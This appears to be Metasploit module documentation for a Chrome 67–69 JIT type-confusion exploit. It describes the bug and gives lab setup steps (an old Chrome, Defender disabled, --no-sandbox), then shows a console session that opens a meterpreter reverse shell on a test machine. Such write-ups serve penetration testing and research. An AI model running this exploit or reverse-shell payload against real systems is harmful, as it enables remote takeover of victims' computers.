Tim W
2.9 KiB
Executable File
This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The type confusion can be used to construct a arbitrary read/write memory primitive, which is used to write shellcode into rwx region of a WebAssembly object.
This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option
Vulnerable Application
The module is compatible with any 64bit Google Chrome (version 67, 68 or 69), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
Vulnerable Application Installation Steps
You can download a vulnerable Chrome version from this location: https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/
You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). You may also need to disable Windows Defender.
Verification Steps
- Do:
use exploit/multi/browser/chrome_object_create - Do:
set payload windows/x64/meterpreter/reverse_tcp - Do:
set LHOST [IP] - Do:
set SRVHOST [IP] - Do:
set URIPATH / [PATH] - Do:
run
Scenarios
Windows 10 and Google Chrome 69.0.3497.100 with --no-sandbox
Start Google Chrome without a sandbox:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox
msf5 > use exploit/multi/browser/chrome_object_create
msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_object_create) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_object_create) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] 192.168.56.3 chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
[*] Sending stage (206403 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49682) at 2020-02-29 14:29:06 +0800
msf5 exploit(multi/browser/chrome_object_create) > sessions 1
[*] Starting interaction with 1...
meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.100
meterpreter >